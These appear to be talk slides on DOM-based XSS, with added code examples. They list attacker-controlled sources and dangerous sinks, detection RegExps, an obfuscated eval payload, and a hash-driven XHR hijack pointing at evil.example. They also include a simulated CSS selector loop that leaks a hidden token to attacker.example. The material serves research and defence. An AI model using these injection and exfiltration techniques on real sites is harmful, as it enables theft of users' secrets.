What Is DOM Based XSS
Index :
- DOM Based XSS
- JS Sources & Sinks
- Analysis of interesting examples
- DOMinator
- Some stats
DOM Based XSS
JavaScript objects are loosely typed.
- If we just want to pass an existence check we can substitute an iframe window for a normal object
- OWASP DOM Based Xss: https://www.owasp.org/index.php/DOM_Based_XSS
- DOMXss Wiki https://code.google.com/p/domxsswiki/wiki/Index
Code Flow & Terminology

- Sources: the input data that can be directly or indirectly controlled by an attacker.
- Filters: operations on Sources which change the content or check for specific structures/values.
- Sinks: potentially dangerous functions that can be abused to turn controlled input into some kind of exploitation.
Input Sources
- Everything taken from the URL: document.URL, document.URLUnencoded, document.location (.pathname | .href | .search | .hash), window.location (.pathname | .href | .search | .hash)
- The Referrer: document.referrer
- The window name: window.name
- document.cookie

- HTML5 postMessage: the message event's .data
- window.dialogArguments (when the window is opened with window.showModalDialog)
CSS DOM Injection: get sensitive values
- CSS3 attribute selectors (http://www.w3.org/TR/css3-selectors/#attribute-selectors): a[href=a] { ... }
- CSS3 attribute substring matching (http://www.w3.org/TR/css3-selectors/#attribute-substrings):
  [att^=val]: represents an element with the att attribute whose value begins with the prefix "val".
  [att$=val]: represents an element with the att attribute whose value ends with the suffix "val".
  [att*=val]: represents an element with the att attribute whose value contains at least one instance of the substring "val".
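As an added example (not from the slides), the prefix-matching selector above turned into an attribute-leaking loop: each round injects one rule per candidate character, and the rule whose prefix matches is the only one that fires. The exfiltration step assumed here, a background url() pointing at an attacker host so the browser reports the matching prefix, is not stated on the slide; the browser is simulated so the whole thing runs offline. CHARSET, the element and attacker.example are constructed for the demonstration.

```javascript
// Added example, not from the slides: leaking an attribute value with
// [att^=val] selectors. The "browser" below is a tiny simulator that applies
// the injected rules to one element and reports which url() it would fetch.

const CHARSET = "0123456789abcdef"; // assumed alphabet of the secret (e.g. a hex token)

// One round of injected CSS: a rule per candidate next character. Only the
// rule whose prefix matches the attribute triggers its url() load.
function buildRules(attr, knownPrefix, exfilHost) {
  return CHARSET.split("").map(c => {
    const guess = knownPrefix + c;
    return `input[${attr}^="${guess}"]{background:url(//${exfilHost}/${guess})}`;
  }).join("\n");
}

// Simulated selector engine: evaluate every rule against the element and
// collect the URLs the browser would request (constructed, no network).
function applyRules(css, element) {
  const fetched = [];
  for (const rule of css.split("\n")) {
    const m = /^input\[(\w+)\^="([^"]*)"\]\{background:url\(([^)]*)\)\}$/.exec(rule);
    if (m && String(element[m[1]] || "").startsWith(m[2])) fetched.push(m[3]);
  }
  return fetched;
}

// Attacker loop: inject, observe the single request that arrives, extend the
// prefix, repeat until no rule fires (value exhausted or char outside CHARSET).
function recoverValue(element, attr = "value", exfilHost = "attacker.example") {
  let prefix = "";
  let rounds = 0;
  while (rounds < 64) {                 // hard stop for the simulation
    rounds++;
    const fetched = applyRules(buildRules(attr, prefix, exfilHost), element);
    if (fetched.length === 0) break;
    prefix = fetched[0].slice(`//${exfilHost}/`.length);
  }
  return { value: prefix, rounds };
}

// Constructed target: a hidden field holding a token
const target = { value: "c0ffee" };
console.log(recoverValue(target)); // { value: 'c0ffee', rounds: 7 }
```

The same loop works with [att$=val] from the other end of the string; [att*=val] is what you use when the position of the secret inside the attribute is unknown.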
HTML 5
Cross Origin Requests could be abused when the request URL comes from a source:

    var url = "/profilePages";
    var xhr = new XMLHttpRequest();
    xhr.open('GET', getQueryParam('debugPage') || url, true);

Facebook issue (#!/profileName):

    var xhr = new XMLHttpRequest();
    xhr.open('GET', location.hash.slice(2), true);

The attacker just needs to point the hash at a host they control and add Access-Control-Allow-Origin: * to the response.
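An added example, not from the slides: the hash-driven xhr.open() pattern above beside a hardened resolver, plus a small model of the browser's cross-origin read check that shows why a wildcard Access-Control-Allow-Origin on the attacker's server is all it takes. The origin https://app.example, the host evil.example and the hashes are constructed for the demonstration; the CORS model ignores credentials and preflight.

```javascript
// Added example, not from the slides: attacker-controlled XHR target from
// location.hash, the same-origin-only fix, and a minimal CORS read model.

const PAGE_ORIGIN = "https://app.example";  // assumed origin of the vulnerable page
const NAME_RE = /^\/[A-Za-z0-9_.-]+$/;      // exactly one path segment, as in "#!/profileName"

// Vulnerable: whatever follows "#!" is the URL handed to xhr.open('GET', ...).
function vulnerableTarget(hash) {
  return hash.slice(2);
}

// Hardened: accept only a single same-origin path segment, then resolve and
// re-check the origin so nothing scheme- or host-like can slip through.
function safeTarget(hash) {
  const raw = hash.slice(2);
  if (!NAME_RE.test(raw)) return null;         // rejects "https:...", "//host/...", "/../x"
  const resolved = new URL(raw, PAGE_ORIGIN);
  if (resolved.origin !== PAGE_ORIGIN) return null;
  return resolved.pathname;
}

// Simplified model of whether script on PAGE_ORIGIN may read a GET response:
// same origin always; cross origin only if the response carries a matching or
// wildcard Access-Control-Allow-Origin (credentials/preflight not modelled).
function browserCanRead(targetUrl, responseHeaders) {
  const target = new URL(targetUrl, PAGE_ORIGIN);
  if (target.origin === PAGE_ORIGIN) return true;
  const acao = responseHeaders["Access-Control-Allow-Origin"];
  return acao === "*" || acao === PAGE_ORIGIN;
}

// Walkthrough with a constructed attacker hash
const attackerHash = "#!//evil.example/payload";
console.log(vulnerableTarget(attackerHash));                         // //evil.example/payload
console.log(browserCanRead(vulnerableTarget(attackerHash), {}));     // false: blocked by SOP
console.log(browserCanRead(vulnerableTarget(attackerHash),
                           { "Access-Control-Allow-Origin": "*" })); // true: attacker opted in
console.log(safeTarget(attackerHash));                               // null
console.log(safeTarget("#!/alice"));                                 // /alice
```

Note that the fix is an allow-list on the shape of the value, not a blocklist of "http" or "//": the protocol-relative form and the dot-segment form both fail the single-segment check before any URL parsing happens.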
Absolute URLs

Classics: Filters and Encoding Differences

Flow Control
Checks for opener, parent, top existence can be fooled.

    if (parent.frameMessage != "sync") {
        addEventListener("message", function (d) { document.write('..' + d.data + '...'); }, true);
    } else {
        document.write('constantData');
    }

Race Conditions: Time of Check to Time of Use.

    if (window.name.match(/^[a-z]*=[0-9]*$/)) { eval(window.name); }
Browsers Countermeasures
Scanning 3400 top sites found exactly 1 using the X-Content-Security-Policy header, with the following content:

Methodology
Find the Sources using the following RegExp:

    /(location\s*[\[.])|([.\[]\s*["']?\s*(arguments|dialogArguments|innerHTML|write(ln)?|open(Dialog)?|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|parent|top|content|self|frames)\W)|(localStorage|sessionStorage|Database)/

Find the Sinks using the following RegExp (all RegExps (c) Mario Heiderich):

    /((src|href|data|location|code|value|action)\s*["'\]]*\s*\+?\s*=)|((replace|assign|navigate|getResponseHeader|open(Dialog)?|showModalDialog|eval|evaluate|execCommand|execScript|setTimeout|setInterval)\s*["'\]]*\s*\()/

Now you have the sources and sinks, and finally you can follow the flow on code like the following.
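An added example, not from the slides: the two RegExps above run line by line over a small JavaScript sample, reporting where a source and a sink land on the same line, which is where flow-following should start. The sample code is constructed for the demonstration, not taken from any site. The patterns are deliberately coarse (the first one also flags document.write, and neither checks word boundaries), so every hit still needs a human to follow the data from source to sink.

```javascript
// Added example, not from the slides: a grep-style pass with the source and
// sink RegExps from the slide, then a per-line "both hit here" shortlist.

const SOURCE_RE = /(location\s*[\[.])|([.\[]\s*["']?\s*(arguments|dialogArguments|innerHTML|write(ln)?|open(Dialog)?|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|parent|top|content|self|frames)\W)|(localStorage|sessionStorage|Database)/g;

const SINK_RE = /((src|href|data|location|code|value|action)\s*["'\]]*\s*\+?\s*=)|((replace|assign|navigate|getResponseHeader|open(Dialog)?|showModalDialog|eval|evaluate|execCommand|execScript|setTimeout|setInterval)\s*["'\]]*\s*\()/g;

// Constructed sample of page script, one statement per line.
const SAMPLE = [
  "var u = document.location.hash.slice(1);",
  "var p = getQueryParam('debugPage');",
  "document.write('<a href=\"' + u + '\">');",
  "eval(window.name);",
  "var t = localStorage.getItem('token');",
  "setTimeout('render(' + t + ')', 10);",
].join("\n");

// All non-overlapping matches of a global RegExp in one line of code.
function findAll(re, line) {
  const hits = [];
  re.lastIndex = 0;
  let m;
  while ((m = re.exec(line)) !== null) {
    hits.push(m[0].trim());
    if (m[0].length === 0) re.lastIndex++; // never loop on a zero-width match
  }
  return hits;
}

// Per-line report: which source and sink patterns fired.
function scan(code) {
  const report = [];
  code.split("\n").forEach((text, i) => {
    const sources = findAll(SOURCE_RE, text);
    const sinks = findAll(SINK_RE, text);
    if (sources.length || sinks.length) report.push({ line: i + 1, text, sources, sinks });
  });
  return report;
}

// Lines where a source feeds a sink directly: the first places to audit.
// Sources used on one line and consumed on another (u on line 1 -> line 3,
// t on line 5 -> line 6) are exactly what the RegExps cannot connect.
function suspiciousLines(code) {
  return scan(code).filter(r => r.sources.length && r.sinks.length).map(r => r.line);
}

for (const r of scan(SAMPLE)) {
  console.log(`line ${r.line}: sources=${JSON.stringify(r.sources)} sinks=${JSON.stringify(r.sinks)}`);
}
console.log("source and sink on the same line:", suspiciousLines(SAMPLE)); // [ 3, 4 ]
```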
Methodology ... ?

- JavaScript is not that easy to analyze!
- Code can be compressed: (function (p,a,c,k,e,d){ ... })()
- Or obfuscated (the XOR with 1337 decodes the escaped string into the real payload, which is then eval'd):

    c = '';
    unescape("%u0540%u0556%u054C%u0519%u054E%u0550%u0557%u0518").split('').map(function (a) { c += String.fromCharCode(a.charCodeAt(0) ^ 1337) });
    eval(c);

- Or simply sla.ckers.ed: this.__parent__['l' + '\x6f' + 'c' + '\x61' + 'tion'] (the key evaluates to 'location')
Possible Solutions
- Static Analyzer. Pro: very good at finding flows if well implemented; very fast. Contra: the problems of every static analyzer: KB, reflection, runtime evaluation, lots of false positives and false negatives, etc.
- Script injection to wrap Sources and Sinks. Pro: uses the native interpreter, so no problem with obfuscation/compression. Contra: cannot follow the flow.
- Runtime analysis with dynamic tainting. Pro: uses the native interpreter, so no problem with obfuscation/compression, and can follow the flow. Contra: doesn't look at alternative paths; just propagates the taint flag, with no tracking of operations (mostly used for defense, like Perl taint mode or PHP taint patches).
My Solution: DOMinator
DOMinator
- DOMinator is a tool for analyzing and identifying DOM XSS: a modified version of SpiderMonkey (the JS engine) that adds dynamic tainting and performs taint propagation tracing.
- A modified version of Firefox that adds taint propagation to DOM attributes and chrome methods.
- An extension for log monitoring and runtime analysis.


Google Code project: http://code.google.com/p/dominator/downloads/list
Mailing List:http://groups.google.com/group/dominator-ml/
Tnx!
^_^